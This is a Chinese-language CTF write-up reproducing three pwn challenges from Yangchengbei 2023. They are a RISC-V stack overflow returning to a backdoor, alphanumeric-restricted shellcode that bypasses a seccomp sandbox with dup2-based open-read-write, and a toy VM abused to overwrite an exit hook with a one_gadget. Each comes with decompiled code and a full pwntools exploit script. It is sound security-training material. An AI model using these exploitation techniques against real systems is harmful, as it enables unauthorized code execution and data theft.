羊城杯2023部分题目复现
题目附件https://github.com/nyyyddddn/ctf/tree/main/%E7%BE%8A%E5%9F%8E%E6%9D%AF2023
risky_login
一道riscv64 小端序 栈溢出 ret2text的题目,最新的ida 9.0可以反编译riscv架构的程序,就不需要用难用的ghidra去分析了
int __cdecl main(int argc, const char **argv, const char **envp)
{
_BYTE v4[288]; // [sp+0h] [-120h] BYREF
init_io();
puts("RiskY LoG1N SySTem");
puts("Input ur name:");
read(0, command, 8uLL);
printf("Hello, %s", command);
puts("Input ur words");
read(0, v4, 0x120uLL);
my_input(v4);
puts("message received");
return 0;
}
char *__fastcall my_input(const char *a1)
{
char v3[248]; // [sp+18h] [-108h] BYREF
byte_12347070 = strlen(a1);
if ( (unsigned __int8)byte_12347070 > 8uLL )
{
puts("too long.");
exit(-1);
}
return strcpy(v3, a1);
}
__int64 backdoor()
{
puts("background debug fun.");
puts("input what you want exec");
read(0, command, 8uLL);
if ( strstr(command, "sh") || strstr(command, "flag") )
{
puts("no.");
exit(-1);
}
return system(command);
}https://ta0lve.github.io/posts/pwn/risc-v/0x01/#%E5%AF%84%E5%AD%98%E5%99%A8%E5%AD%A6%E4%B9%A0
在my input这里存在一个栈溢出,因为strlen只检查低一个字节的数据,那该溢出多少?通过阅读文档可以发现这个ret相当于jmp ra的作用,然后sd ra, 110h+var_s8(sp) 这个是存储返回地址,所以返回地址在栈底 - 0x8的位置,然后strcpy地址距离栈底 0x108,偏移0x100就刚刚好到返回地址那了
.text:0000000012345786 my_input: # CODE XREF: main+7A↓p
.text:0000000012345786
.text:0000000012345786 var_108 = -108h
.text:0000000012345786 var_F8 = -0F8h
.text:0000000012345786 var_s0 = 0
.text:0000000012345786 var_s8 = 8
.text:0000000012345786 arg_0 = 10h
.text:0000000012345786
.text:0000000012345786 addi sp, sp, -120h
.text:0000000012345788 sd ra, 110h+var_s8(sp)
.text:000000001234578A sd s0, 110h+var_s0(sp)
.text:000000001234578C addi s0, sp, 110h+arg_0
.text:000000001234578E sd a0, -10h+var_108(s0)
.text:0000000012345792 ld a0, -10h+var_108(s0)
.text:0000000012345796 call strlen
.text:000000001234579E mv a5, a0
.text:00000000123457A0 andi a4, a5, 0FFh
.text:00000000123457A4 sb a4, byte_12347070
.text:00000000123457A8 lbu a5, byte_12347070
.text:00000000123457AC mv a4, a5
.text:00000000123457AE li a5, 8
.text:00000000123457B0 bgeu a5, a4, loc_123457CE
.text:00000000123457B4 lui a5, %hi(aTooLong) # "too long."
.text:00000000123457B8 addi a0, a5, %lo(aTooLong) # "too long."
.text:00000000123457BC call puts
.text:00000000123457C4 li a0, -1
.text:00000000123457C6 call exit
.text:00000000123457CE # ---------------------------------------------------------------------------
.text:00000000123457CE
.text:00000000123457CE loc_123457CE: # CODE XREF: my_input+2A↑j
.text:00000000123457CE addi a5, s0, -10h+var_F8
.text:00000000123457D2 ld a1, -10h+var_108(s0)
.text:00000000123457D6 mv a0, a5
.text:00000000123457D8 call strcpy
.text:00000000123457E0 nop
.text:00000000123457E2 ld ra, 110h+var_s8(sp)
.text:00000000123457E4 ld s0, 110h+var_s0(sp)
.text:00000000123457E6 addi sp, sp, 120h
.text:00000000123457E8 ret覆盖返回地址为backdoor,然后cat fl* 就能把flag读出来了
那riscv的程序如何调试呢?? qemu 有一个 -g的参数可以通过gdb-multiarch remote连上去打断点调试,在process开程序的时候加这个-g的参数就可以通过gdb连上去调试了
debug.sh
gdb-multiarch -ex "set architecture riscv" \
-ex "set exception-debugger on" \
-ex "file ./pwn" \
-ex "target remote localhost:1234" \
-ex "b *0x12345796" \
-ex "c"exp
from pwn import *
context(os='linux', arch='riscv', log_level='debug',endian = 'little')
context.log_level = 'debug'
# p = process(["qemu-riscv64", "-L", "./", "-g", "1234", "./pwn"])
p = process(["qemu-riscv64", "-L", "./", "./pwn"])
backdoor = 0x123456ee
p.recvuntil('Input ur name:')
p.send("A")
p.recvuntil("Input ur words")
p.sendline(b"a" * 0x100 + p64(backdoor))
p.interactive()shellcode
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
char buf[40]; // [rsp+0h] [rbp-30h] BYREF
unsigned __int64 v5; // [rsp+28h] [rbp-8h]
v5 = __readfsqword(0x28u);
init();
puts("[0] The Joy Of Contsructing shellcode ~");
puts("[1] Are You Superstar In Ctfers?");
puts("[2] Input: (ye / no)");
read(0, buf, 2uLL);
if ( !strcmp(buf, "ye") )
puts("xxxx{xxxx_xxxx_xxxx_xxxx}");
else
vuln(buf);
puts("[3] Bye~");
return 0LL;
}
unsigned __int64 __fastcall sub_13A2(const char *a1)
{
int v2; // [rsp+14h] [rbp-3Ch]
char *buf; // [rsp+18h] [rbp-38h]
char *v4; // [rsp+20h] [rbp-30h]
void (*s[3])(void); // [rsp+30h] [rbp-20h] BYREF
unsigned __int64 v6; // [rsp+48h] [rbp-8h]
v6 = __readfsqword(0x28u);
printf("[3] Your Answer: %s\n", a1);
puts("[4] Welcome To P0P's World!!!");
memset(s, 0, 0x10uLL);
puts("[5] ======== Input Your P0P Code ========");
for ( buf = (char *)s; buf; ++buf )
{
read(0, buf, 1uLL);
if ( (buf - (char *)s) >> 4 > 0 )
break;
}
v4 = (char *)s;
v2 = 0;
puts("[6] Next");
if ( s )
{
while ( *v4 >= 79 && *v4 <= 95 )
{
++v2;
++v4;
}
if ( !((v4 - (char *)s) >> 4) )
{
puts("[*] It's Not GW's Expect !");
exit(-1);
}
}
puts("[7] Just Do It!");
sub_1289();
s[0]();
return v6 - __readfsqword(0x28u);
}
__int64 sub_1289()
{
__int64 v1; // [rsp+8h] [rbp-48h]
v1 = seccomp_init(0LL);
seccomp_rule_add(v1, 2147418112LL, 2LL, 0LL);
seccomp_rule_add(v1, 2147418112LL, 0LL, 1LL);
seccomp_rule_add(v1, 2147418112LL, 1LL, 1LL);
seccomp_rule_add(v1, 2147418112LL, 33LL, 0LL);
return seccomp_load(v1);
}checksec 栈有rwx的权限
lhj@lhj-virtual-machine:~/Desktop/ycb2023/shellcode$ checksec shellcode
[!] Could not populate PLT: invalid syntax (unicorn.py, line 110)
[*] '/home/lhj/Desktop/ycb2023/shellcode/shellcode'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX unknown - GNU_STACK missing
PIE: PIE enabled
Stack: Executable程序的逻辑是输入17个字节的数据(read 输入数据的逻辑有问题导致可以多输入一个字节) 然后判断输入的长度是否大于等于16个字节,判断每个字节是否是[79,95]这个范围的字节码,如果是就会执行这些shellcode
因为seccomp要满足一定的输入约束才会执行load bpf,所以直接seccomp dump是dump不出来沙箱规则的,得用python模拟符合输入约束的数据才能把沙箱规则dump出来,可以发现要用orw把flag读出来,然后rw对fd还有些约束,r的fd必须小于等于2,w的fd必须大于2,dup2(old_fd,new_fd)系统调用可以将一个fd重定向到一个新的fd,所以orw得用dup2重定向一下
lhj@lhj-virtual-machine:~/Desktop/ycb2023/shellcode$ python test.py | seccomp-tools dump ./shellcode
[0] The Joy Of Contsructing shellcode ~
[1] Are You Superstar In Ctfers?
[2] Input: (ye / no)
[3] Your Answer: b'
[4] Welcome To P0P's World!!!
[5] ======== Input Your P0P Code ========
[6] Next
[7] Just Do It!
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x12 0xc000003e if (A != ARCH_X86_64) goto 0020
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x0f 0xffffffff if (A != 0xffffffff) goto 0020
0005: 0x15 0x0d 0x00 0x00000002 if (A == open) goto 0019
0006: 0x15 0x0c 0x00 0x00000021 if (A == dup2) goto 0019
0007: 0x15 0x00 0x05 0x00000000 if (A != read) goto 0013
0008: 0x20 0x00 0x00 0x00000014 A = fd >> 32 # read(fd, buf, count)
0009: 0x25 0x0a 0x00 0x00000000 if (A > 0x0) goto 0020
0010: 0x15 0x00 0x08 0x00000000 if (A != 0x0) goto 0019
0011: 0x20 0x00 0x00 0x00000010 A = fd # read(fd, buf, count)
0012: 0x25 0x07 0x06 0x00000002 if (A > 0x2) goto 0020 else goto 0019
0013: 0x15 0x00 0x06 0x00000001 if (A != write) goto 0020
0014: 0x20 0x00 0x00 0x00000014 A = fd >> 32 # write(fd, buf, count)
0015: 0x25 0x03 0x00 0x00000000 if (A > 0x0) goto 0019
0016: 0x15 0x00 0x03 0x00000000 if (A != 0x0) goto 0020
0017: 0x20 0x00 0x00 0x00000010 A = fd # write(fd, buf, count)
0018: 0x25 0x00 0x01 0x00000002 if (A <= 0x2) goto 0020
0019: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0020: 0x06 0x00 0x00 0x00000000 return KILLtest.py
from pwn import *
context(os='linux', arch='amd64')
# context.log_level='debug'
shellcode = asm(
'''
push rax
pop rsi
push rbx
pop rax
push rbx
pop rdi
pop rcx
pop rcx
pop rsp
pop rbp
push rbp
push rbp
push rbp
push rbp
push rbp
pop rdx
''').ljust(17, b'Y')
print(shellcode)限制的范围都是一些可以调整堆栈和寄存器的asm
# for i in range(79,96):
# b = bytes([i])
# try:
# print(disasm(b))
# except:
# pass
# 0: 4f rex.WRXB
# 0: 50 push rax
# 0: 51 push rcx
# 0: 52 push rdx
# 0: 53 push rbx
# 0: 54 push rsp
# 0: 55 push rbp
# 0: 56 push rsi
# 0: 57 push rdi
# 0: 58 pop rax
# 0: 59 pop rcx
# 0: 5a pop rdx
# 0: 5b pop rbx
# 0: 5c pop rsp
# 0: 5d pop rbp
# 0: 5e pop rsi
# 0: 5f pop rdi通过yes和no那两个字节输入那 写一个syscall,push和pop调整堆栈,把syscall给读到一个寄存器里,然后通过push写满整个栈,这样在shellcode执行到结尾的时候就会取到这个syscall,syscall read一次后用dup2 orw的shellcode把flag读出来就行了
exp
from pwn import *
# from LibcSearcher import *
# import itertools
# import ctypes
context(os='linux', arch='amd64')
context.log_level='debug'
is_debug = 1
IP = "127.0.0.1"
PORT = 9999
elf = context.binary = ELF('./shellcode')
libc = elf.libc
def connect():
return remote(IP, PORT) if not is_debug else process()
g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])
def create_ucontext(
src: int,
rsp=0,
rbx=0,
rbp=0,
r12=0,
r13=0,
r14=0,
r15=0,
rsi=0,
rdi=0,
rcx=0,
r8=0,
r9=0,
rdx=0,
rip=0xDEADBEEF,
) -> bytearray:
b = bytearray(0x200)
b[0xE0:0xE8] = p64(src) # fldenv ptr
b[0x1C0:0x1C8] = p64(0x1F80) # ldmxcsr
b[0xA0:0xA8] = p64(rsp)
b[0x80:0x88] = p64(rbx)
b[0x78:0x80] = p64(rbp)
b[0x48:0x50] = p64(r12)
b[0x50:0x58] = p64(r13)
b[0x58:0x60] = p64(r14)
b[0x60:0x68] = p64(r15)
b[0xA8:0xB0] = p64(rip) # ret ptr
b[0x70:0x78] = p64(rsi)
b[0x68:0x70] = p64(rdi)
b[0x98:0xA0] = p64(rcx)
b[0x28:0x30] = p64(r8)
b[0x30:0x38] = p64(r9)
b[0x88:0x90] = p64(rdx)
return b
def setcontext32(libc: ELF, **kwargs) -> (int, bytes):
got = libc.address + libc.dynamic_value_by_tag("DT_PLTGOT")
plt_trampoline = libc.address + libc.get_section_by_name(".plt").header.sh_addr
return got, flat(
p64(0),
p64(got + 0x218),
p64(libc.symbols["setcontext"] + 32),
p64(plt_trampoline) * 0x40,
create_ucontext(got + 0x218, rsp=libc.symbols["environ"] + 8, **kwargs),
)
# e.g. dest, payload = setcontext32.setcontext32(
# libc, rip=libc.sym["system"], rdi=libc.search(b"/bin/sh").__next__()
# )
p = connect()
# for i in range(79,96):
# b = bytes([i])
# try:
# print(disasm(b))
# except:
# pass
# 0: 4f rex.WRXB
# 0: 50 push rax
# 0: 51 push rcx
# 0: 52 push rdx
# 0: 53 push rbx
# 0: 54 push rsp
# 0: 55 push rbp
# 0: 56 push rsi
# 0: 57 push rdi
# 0: 58 pop rax
# 0: 59 pop rcx
# 0: 5a pop rdx
# 0: 5b pop rbx
# 0: 5c pop rsp
# 0: 5d pop rbp
# 0: 5e pop rsi
# 0: 5f pop rdi
sa("[2] Input: (ye / no)",asm('syscall'))
gdb_comm = '''
b *$rebase(0x14DF)
c
'''
# gdb.attach(p,gdb_comm)
sa("[5] ======== Input Your P0P Code ========",asm(
'''
push rax
pop rsi
push rbx
pop rax
push rbx
pop rdi
pop rcx
pop rcx
pop rsp
pop rbp
push rbp
push rbp
push rbp
push rbp
push rbp
pop rdx
''').ljust(17, asm('NOP')))
def convert_str_asmencode(content: str):
out = ""
for i in content:
out = hex(ord(i))[2:] + out
out = "0x" + out
return out
# orw_shellcode = b'\x90' * 0x20 + asm(f'''
# xor rsi,rsi
# xor rdx,rdx
# push rdx
# mov rax,{convert_str_asmencode("/flag")}
# push rax
# mov rdi,rsp
# xor rax,rax
# mov al,2
# syscall
# mov rdi,rax
# mov dl,0x40
# mov rsi,rsp
# mov al,0
# syscall
# xor rdi,rdi
# mov al,1
# syscall
# ''')
orw_shellcode = b'\x90' * 0x20 + asm(f'''
xor rsi,rsi
xor rdx,rdx
push rdx
mov rax,{convert_str_asmencode("/flag")}
push rax
mov rdi,rsp
xor rax,rax
mov al,2
syscall
mov rax,33 # dup2(old_fd,new_fd)
mov rdi,3 # flag_fd(3) to 0
mov rsi,0
syscall
mov rax,0
mov rdi,0
mov rsi,rsp
mov rdx,0x40 # read flag_content to rsp
syscall
mov rax,33
mov rdi,1 # 1 to 3
mov rsi,3
syscall
mov rax,1
mov rdi,3
mov rsi,rsp
mov rdx,0x40
syscall
''')
s(orw_shellcode)
p.interactive()easy_vm
void __fastcall __noreturn main(int a1, char **a2, char **a3)
{
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
puts("It's a easy vmpwn,enjoy it");
ptr = malloc(0x1000uLL);
malloc(0x20uLL);
free(ptr);
ptr = 0LL;
stack_memroy = (__int64)malloc(0x1000uLL);
pc = malloc(0x1000uLL);
puts("Inputs your code:");
read(0, pc, 0x1000uLL);
while ( *(_BYTE *)pc )
{
switch ( *(_BYTE *)pc )
{
case 1: // push tmp
stack_memroy += 8LL;
*(_QWORD *)stack_memroy = tmp;
pc = (char *)pc + 8;
break;
case 2: // pop tmp
tmp = *(_QWORD *)stack_memroy;
stack_memroy -= 8LL;
pc = (char *)pc + 8;
break;
case 3: // modify_memory
*(_QWORD *)tmp = *(_QWORD *)stack_memroy;
pc = (char *)pc + 8;
break;
case 4: // xor
tmp ^= *((_QWORD *)pc + 1);
pc = (char *)pc + 16;
break;
case 5:
tmp = *(_QWORD *)tmp; // show_memory
pc = (char *)pc + 8;
break;
case 6: // add
tmp += *((_QWORD *)pc + 1);
pc = (char *)pc + 16;
break;
case 7: // sub
tmp -= *((_QWORD *)pc + 1);
pc = (char *)pc + 16;
break;
default:
pc = (char *)pc + 8;
break;
}
}
exit(0);
}题目实现了一个简单的vm,有任意地址写的功能,然后stack_memroy残留了一个指向main_arena的指针,可以通过这个指针算出libc_base和ld_base,glibc 2.31下有一个exit hook,具体是exit - > __run_exit_handlers -> _dl_fini - > (rtld_lock_default_lock_recursive & rtld_lock_default_unlock_recursive ) lock 和 unlock这两个函数的调用方式是在rtld_global找这两个函数的指针然后call,然后rtld_global又在ld的数据段上,如果能知道ld_base就能算出这两个指针的地址,所以可以通过写这两个指针为one gadget去劫持控制流
exp
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
p = process('./pwn')
gadgets = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = gadgets[3]
libc_base_offset = 0x3c4b78
ld_base_offset = 0x400000
exit_hook_offset = 0x226f48
# _dl_rtld_lock_recursive
payload = p64(2)
payload += p64(7) + p64(libc_base_offset) # tmp = libc_base
payload += p64(6) + p64(one_gadget) # tmp = one_gadget
payload += p64(1) # push one_gadget
payload += p64(7) + p64(one_gadget) # tmp = libc_base
payload += p64(6) + p64(ld_base_offset) # tmp = ld_base
payload += p64(6) + p64(exit_hook_offset) # tmp = &_dl_rtld_lock_recursive
payload += p64(3) # &_dl_rtld_lock_recursive = one_gadget
# gdb.attach(p)
p.sendafter('your code:', payload)
p.interactive()